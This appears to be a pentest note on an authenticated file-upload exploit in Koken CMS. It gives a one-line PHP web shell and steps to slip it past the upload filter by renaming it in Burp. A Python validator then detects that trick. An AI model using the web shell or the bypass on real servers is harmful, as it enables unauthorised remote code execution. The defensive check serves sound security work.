# Koken CMS

Valid credentials for the dashboard are required before the exploit can be triggered.

<https://www.exploit-db.com/exploits/48706>

**Steps to exploit:**

\[1] Create a malicious PHP file with this content:

`<?php system($_GET['cmd']);?>`

\[2] Save it as "image.php.jpg".

\[3] While authenticated, go to the Koken CMS Dashboard, upload the file using the "Import Content" button (Library panel), and send the HTTP request to Burp.

\[4] In Burp, rename the file to "image.php".

\[5] Click on the imported file to trigger the revshell.
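
A defender-side check for the upload path in the steps above, as an added example (not code from Koken or from the linked exploit entry): it judges the filename the server actually received and the file content, so the rename in step 4 is caught. The function name `check_upload`, the extension lists and the sample inputs are assumptions constructed for illustration.

```python
import os

# Assumed policy for this example: the image types the library should accept.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
# Extensions commonly mapped to the PHP handler; adjust to the server's config.
SCRIPT_EXT = {".php", ".phtml", ".phar", ".php5", ".php7"}
# Leading bytes of the allowed image formats.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

def check_upload(received_name: str, data: bytes) -> list[str]:
    """Return the reasons to reject an upload; an empty list means accept.

    received_name must be the filename the server parsed from the request,
    because anything checked in the browser can be changed in transit.
    """
    reasons = []
    base = os.path.basename(received_name.replace("\\", "/")).lower()
    parts = base.split(".")
    final_ext = "." + parts[-1] if len(parts) > 1 else ""
    if final_ext not in ALLOWED_EXT:
        reasons.append(f"extension {final_ext or '(none)'} not allowed")
    # Any script extension in the name is suspect, not only the last one.
    if any("." + p in SCRIPT_EXT for p in parts[1:]):
        reasons.append("script extension in filename")
    sigs = MAGIC.get(final_ext, ())
    if sigs and not data.startswith(sigs):
        reasons.append("content does not match image type")
    # Heuristic: a PHP open tag has no place in an uploaded image.
    if b"<?php" in data.lower():
        reasons.append("PHP open tag in content")
    return reasons

# Constructed samples: the page's file under both names, and a GIF header.
PAYLOAD = b"<?php system($_GET['cmd']);?>"
SAMPLES = [
    ("image.php.jpg", PAYLOAD),
    ("image.php", PAYLOAD),
    ("photo.gif", b"GIF89a\x01\x00\x01\x00\x00\x00\x00;"),
]
if __name__ == "__main__":
    for name, data in SAMPLES:
        print(name, check_upload(name, data) or "accept")
```

Storing accepted files under a server-generated name in a directory where script execution is disabled removes the remaining dependence on the filename.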
